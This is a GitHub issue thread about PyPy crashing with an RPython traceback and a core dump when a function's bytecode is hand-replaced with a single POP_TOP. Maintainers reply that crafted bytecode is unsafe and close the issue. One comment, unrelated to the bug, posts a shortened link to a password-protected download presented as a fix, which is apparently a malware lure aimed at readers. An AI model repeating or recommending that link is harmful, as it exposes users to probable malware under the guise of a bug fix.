### ISSUE TITLE
RPython traceback and crash with custom bytecode modification

### ISSUE THREAD

**Issue by zzl261004** [pypy/pypy#5026]
Hello. I am encountering an issue while running a small Python program with PyPy, which results in an RPython traceback and a core dump. Below is the program.py:

```python
import dis
func = lambda: None
func.__code__ = func.__code__.replace(co_code=bytes([dis.opmap['POP_TOP'], 0]))
func()
```
Running the program **with or without JIT** :
```
RPython traceback:
  File "pypy_interpreter_1.c", line 44580, in execute_frame
  File "rpython_jit_metainterp.c", line 7524, in ll_portal_runner__Unsigned_Bool_pypy_interpreter
  File "pypy_module_pypyjit.c", line 945, in portal_11
  File "pypy_interpreter_2.c", line 52468, in handle_bytecode__AccessDirect_None
  File "pypy_interpreter_3.c", line 33398, in dispatch_bytecode__AccessDirect_None
  File "pypy_interpreter_3.c", line 38935, in MISSING_OPCODE__AccessDirect_None
Traceback (most recent call last):
  File "/bug/program.py", line 4, in <module>
    func()
  File "/bug/program.py", line 2, in <lambda>
    func = lambda: None
                   ^^^^
SystemError: unexpected internal exception (please report a bug): <BytecodeCorruption object at 0x7f6d8232f2a8>; internal traceback was dumped to stderr
```

With **function_threshold=1**: When running the script with **pypy --jit function_threshold=1 program.py**, the following traceback occurs, leading to a Fatal RPython error and an **Aborted (core dumped)**:

```
RPython traceback:
  File "rpython_jit_metainterp_4.c", line 25353, in MIFrame_run_one_step
  File "rpython_jit_metainterp_5.c", line 44028, in handler_getarrayitem_vable_r_1
  File "rpython_jit_metainterp_6.c", line 5326, in MIFrame__opimpl_getarrayitem_vable
  File "rpython_jit_metainterp_6.c", line 32960, in MIFrame__get_arrayitem_vable_index
Fatal RPython error: AssertionError
Aborted (core dumped)
```

Environment:
Python 3.10.14 (39dc8d3c85a7, Aug 27 2024, 14:32:27)
[PyPy 7.3.17 with GCC 10.2.1 20210130 (Red Hat 10.2.1-11)] on linux
Operating System: Ubuntu 22.04.4 LTS

**Comment by yousefsk345** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by mattip** [comment]
Why would you expect any other outcome?

**Comment by zzl261004** [comment]
> Why would you expect any other outcome?

I apologize, I may not be very familiar with PyPy. I would like to ask if the appearance of an RPython traceback in the standard error means that there is a potential issue within PyPy itself?

**Comment by cfbolz** [comment]
In CPython you get a segfault instead, with no information about what's happening on the C level. In both interpreters you can start with `-X faulthandler` to also get a stack trace.

It's true that Python (both PyPy and CPy) could in theory have a bytecode verifier, like the JVMs have. On manually constructed bytecode it would check safety properties and prevent you from popping from an empty stack and the like.

**Comment by mattip** [comment]
Closing, we won't fix this before CPython does.
